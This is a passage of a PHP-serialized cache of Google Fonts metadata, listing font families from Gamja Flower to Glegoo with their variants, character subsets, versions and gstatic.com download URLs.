Flower\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/gamjaflower/v20/6NUR8FiKJg-Pa0rM6uN40Z4kyf9Fdty2ew.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:439;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Gantari\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g0gOz3wa5GD2qnm.ttf\";s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g2gOj3wa5GD2qnm.ttf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g1-Oj3wa5GD2qnm.ttf\";s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g0gOj3wa5GD2qnm.ttf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g0SOj3wa5GD2qnm.ttf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g3-PT3wa5GD2qnm.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g3HPT3wa5GD2qnm.ttf\";s:3:\"800\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g2gPT3wa5GD2qnm.ttf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/gantari/v1/jVyV7nvyB2HL8iZyDk4GVvSZ5MtC9g2JPT3wa5GD2qnm.ttf\";s:9:\"100italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoedWyYZWh37nmpWc.ttf\";s:9:\"200italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeVWzYZWh37nmpWc.ttf\";s:9:\"300italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeYuzYZWh37nmpWc.ttf\";s:6:\"italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoedWzYZWh37nmpWc.ttf\";s:9:\"500italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeeezYZWh37nmpWc.ttf\";s:9:\"600italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeQu0YZWh37nmpWc.ttf\";s:9:\"700italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeTK0YZWh37nmpWc.ttf\";s:9:\"800italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeVW0YZWh37nmpWc.ttf\";s:9:\"900italic\";s:89:\"http://fonts.gstatic.com/s/gantari/v1/jVyb7nvyB2HL8iZyJEc0qSzwj1Hs8RjoeXy0YZWh37nmpWc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:440;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Gayathri\";s:8:\"variants\";a:3:{i:0;s:3:\"100\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"malayalam\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"100\";s:75:\"http://fonts.gstatic.com/s/gayathri/v15/MCoWzAb429DbBilWLLhc-pvSA_gA2W8.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/gayathri/v15/MCoQzAb429DbBilWLIA48J_wBugA.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/gayathri/v15/MCoXzAb429DbBilWLLiE37v4LfQJwHbn.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:441;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Gelasio\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/gelasio/v10/cIf9MaFfvUQxTTqSxCmrYGkHgIs.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/gelasio/v10/cIf_MaFfvUQxTTqS9CuhZEsCkIt9QQ.ttf\";s:3:\"500\";s:74:\"http://fonts.gstatic.com/s/gelasio/v10/cIf4MaFfvUQxTTqS_N2CRGEsnIJkWL4.ttf\";s:9:\"500italic\";s:77:\"http://fonts.gstatic.com/s/gelasio/v10/cIf6MaFfvUQxTTqS9CuZkGImmKBhSL7Y1Q.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/gelasio/v10/cIf4MaFfvUQxTTqS_PGFRGEsnIJkWL4.ttf\";s:9:\"600italic\";s:77:\"http://fonts.gstatic.com/s/gelasio/v10/cIf6MaFfvUQxTTqS9CuZvGUmmKBhSL7Y1Q.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/gelasio/v10/cIf4MaFfvUQxTTqS_JWERGEsnIJkWL4.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/gelasio/v10/cIf6MaFfvUQxTTqS9CuZ2GQmmKBhSL7Y1Q.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:442;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Gemunu Libre\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:7:\"sinhala\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:97:\"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp05iJPvSLeMXPIWA.ttf\";s:3:\"300\";s:97:\"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp00aJPvSLeMXPIWA.ttf\";s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp0xiJPvSLeMXPIWA.ttf\";s:3:\"500\";s:97:\"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp0yqJPvSLeMXPIWA.ttf\";s:3:\"600\";s:97:\"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp08aOPvSLeMXPIWA.ttf\";s:3:\"700\";s:97:\"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp0_-OPvSLeMXPIWA.ttf\";s:3:\"800\";s:97:\"http://fonts.gstatic.com/s/gemunulibre/v8/X7n34bQ6Cfy7jKGXVE_YlqnbEQAFP-PIuTCp05iOPvSLeMXPIWA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:443;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Genos\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cherokee\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVqknorUK6K7ZsAg.ttf\";s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVKkjorUK6K7ZsAg.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwV9EjorUK6K7ZsAg.ttf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVqkjorUK6K7ZsAg.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVmEjorUK6K7ZsAg.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVdE_orUK6K7ZsAg.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVTU_orUK6K7ZsAg.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVKk_orUK6K7ZsAg.ttf\";s:3:\"900\";s:82:\"http://fonts.gstatic.com/s/genos/v6/SlGNmQqPqpUOYTYjacb0Hc91fTwVA0_orUK6K7ZsAg.ttf\";s:9:\"100italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgsA70i-CbN8Ard7.ttf\";s:9:\"200italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYguA7ki-CbN8Ard7.ttf\";s:9:\"300italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgte7ki-CbN8Ard7.ttf\";s:6:\"italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgsA7ki-CbN8Ard7.ttf\";s:9:\"500italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgsy7ki-CbN8Ard7.ttf\";s:9:\"600italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgve6Ui-CbN8Ard7.ttf\";s:9:\"700italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgvn6Ui-CbN8Ard7.ttf\";s:9:\"800italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYguA6Ui-CbN8Ard7.ttf\";s:9:\"900italic\";s:84:\"http://fonts.gstatic.com/s/genos/v6/SlGPmQqPqpUOYRwqWzksdKTv0zsAYgup6Ui-CbN8Ard7.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:444;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Gentium Book Basic\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/gentiumbookbasic/v16/pe0zMJCbPYBVokB1LHA9bbyaQb8ZGjcIV7t7w6bE2A.ttf\";s:6:\"italic\";s:96:\"http://fonts.gstatic.com/s/gentiumbookbasic/v16/pe0xMJCbPYBVokB1LHA9bbyaQb8ZGjc4VbF_4aPU2Ec9.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/gentiumbookbasic/v16/pe0wMJCbPYBVokB1LHA9bbyaQb8ZGjcw65Rfy43Y0V4kvg.ttf\";s:9:\"700italic\";s:100:\"http://fonts.gstatic.com/s/gentiumbookbasic/v16/pe0-MJCbPYBVokB1LHA9bbyaQb8ZGjc4VYnDzofc81s0voO3.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:445;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Gentium Book Plus\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-06-28\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/gentiumbookplus/v1/vEFL2-RHBgUK5fbjKxRpbBtJPyRpofKfdbLOrdPV.ttf\";s:6:\"italic\";s:93:\"http://fonts.gstatic.com/s/gentiumbookplus/v1/vEFN2-RHBgUK5fbjKxRpbBtJPyRpocKdf7bsqMPVZb4.ttf\";s:3:\"700\";s:94:\"http://fonts.gstatic.com/s/gentiumbookplus/v1/vEFO2-RHBgUK5fbjKxRpbBtJPyRpocojWpbGhs_cfKe1.ttf\";s:9:\"700italic\";s:97:\"http://fonts.gstatic.com/s/gentiumbookplus/v1/vEFA2-RHBgUK5fbjKxRpbBtJPyRpocKdRwrDjMv-ebe1Els.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:446;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Gentium Plus\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v1\";s:12:\"lastModified\";s:10:\"2022-05-31\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/gentiumplus/v1/Iurd6Ytw-oSPaZ00r2bNe8VpjJtM6G0t9w.ttf\";s:6:\"italic\";s:82:\"http://fonts.gstatic.com/s/gentiumplus/v1/IurD6Ytw-oSPaZ00r2bNe8VZjpFIymg9957e.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/gentiumplus/v1/IurC6Ytw-oSPaZ00r2bNe8VRMLRo4EYx_ofHsw.ttf\";s:9:\"700italic\";s:86:\"http://fonts.gstatic.com/s/gentiumplus/v1/IurA6Ytw-oSPaZ00r2bNe8VZjqn05Uw13ILXs-h6.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:447;O:8:\"stdClass\":8:{s:6:\"family\";s:3:\"Geo\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:61:\"http://fonts.gstatic.com/s/geo/v19/CSRz4zRZlufVL3BmQjlCbQ.ttf\";s:6:\"italic\";s:63:\"http://fonts.gstatic.com/s/geo/v19/CSRx4zRZluflLXpiYDxSbf8r.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:448;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Georama\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5GvktmQsL5_tgbg.ttf\";s:3:\"200\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5mvgtmQsL5_tgbg.ttf\";s:3:\"300\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5RPgtmQsL5_tgbg.ttf\";s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5GvgtmQsL5_tgbg.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5KPgtmQsL5_tgbg.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5xP8tmQsL5_tgbg.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5_f8tmQsL5_tgbg.ttf\";s:3:\"800\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5mv8tmQsL5_tgbg.ttf\";s:3:\"900\";s:104:\"http://fonts.gstatic.com/s/georama/v8/MCo5zAn438bIEyxFf6swMnNpvPcUwW4u4yRcDh-ZjxApn9K5s_8tmQsL5_tgbg.ttf\";s:9:\"100italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rvF2wEPxf5wbh3T.ttf\";s:9:\"200italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rtF2gEPxf5wbh3T.ttf\";s:9:\"300italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rub2gEPxf5wbh3T.ttf\";s:6:\"italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rvF2gEPxf5wbh3T.ttf\";s:9:\"500italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rv32gEPxf5wbh3T.ttf\";s:9:\"600italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rsb3QEPxf5wbh3T.ttf\";s:9:\"700italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rsi3QEPxf5wbh3T.ttf\";s:9:\"800italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rtF3QEPxf5wbh3T.ttf\";s:9:\"900italic\";s:106:\"http://fonts.gstatic.com/s/georama/v8/MCo_zAn438bIEyxFVaIC0ZMQ72G6xnvmodYVPOBB5nuzMdWs0rts3QEPxf5wbh3T.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:449;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Geostar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/geostar/v22/sykz-yx4n701VLOftSq9-trEvlQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:450;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Geostar Fill\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/geostarfill/v22/AMOWz4SWuWiXFfjEohxQ9os0U1K2w9lb4g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:451;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Germania One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/germaniaone/v20/Fh4yPjrqIyv2ucM2qzBjeS3ezAJONau6ew.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:452;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Gideon Roman\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/gideonroman/v7/e3tmeuGrVOys8sxzZgWlmXoge0PWovdU4w.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:453;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Gidugu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:6:\"telugu\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/gidugu/v21/L0x8DFMkk1Uf6w3RvPCmRSlUig.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:454;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Gilda Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/gildadisplay/v13/t5tmIRoYMoaYG0WEOh7HwMeR7TnFrpOHYh4.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:455;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Girassol\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/girassol/v16/JTUUjIo_-DK48laaNC9Nz2pJzxbi.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:456;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Give You Glory\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/giveyouglory/v15/8QIQdiHOgt3vv4LR7ahjw9-XYc1zB4ZD6rwa.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:457;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Glass Antiqua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/glassantiqua/v20/xfu30Wr0Wn3NOQM2piC0uXOjnL_wN6fRUkY.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:458;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Glegoo\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-21\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/glegoo/v14/_Xmt-HQyrTKWaw2Ji6mZAI91xw.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/glegoo/v14/_Xmu-HQyrTKWaw2xN4a9CKRpzimMsg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:459;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Gloria 